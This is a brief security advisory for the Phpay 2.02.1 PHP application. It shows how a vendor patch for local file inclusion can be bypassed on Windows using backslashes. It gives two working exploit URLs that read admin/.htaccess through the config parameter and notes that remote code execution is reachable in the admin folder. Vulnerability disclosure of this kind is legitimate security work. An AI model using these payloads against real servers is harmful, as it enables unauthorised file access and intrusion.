By Michael Brooks

Vulnerability Type:Local File Inclusion

Software: Phpay

Homepage:http://sourceforge.net/projects/phpay/

Version Affected:2.02.1



Phpay has been affected by multiple local file include flaws, as a result this patch was written:

$config = ereg_replace(":","", $config);

$config = trim(ereg_replace("../","", $config));

$config = trim(ereg_replace("/","", $config));

if (($config=="")|| (!eregi(".inc.php",$config))){$config="config.inc.php"; echo "<!--$config-->\n";}

if (!file_exists("$config")) { echo "panic: $config doesn't exist!! Did you backup it after installation? ..."; exit;}

require("./$config");



To bypass this patch backslashes can be used instead of forward slashes on windows systems.  

Also .inc.php must exists *somewhere* in the string.

Local File Include for windows only:

http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\\..\\admin\\.htaccess

or if magic_quotes_gpc is turned on:

http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.htaccess



Remote code execution is accessible in the ./admin/ folder. 

The admin folder *should* be protected by a .htaccess file similar to osCommerce2. 



Vulnerable configuration:

A there is a call to extract($_GET) so the exploit will work regardless of register_globals.  Using Linux is a very good fix for this issue. 





Merry Christmas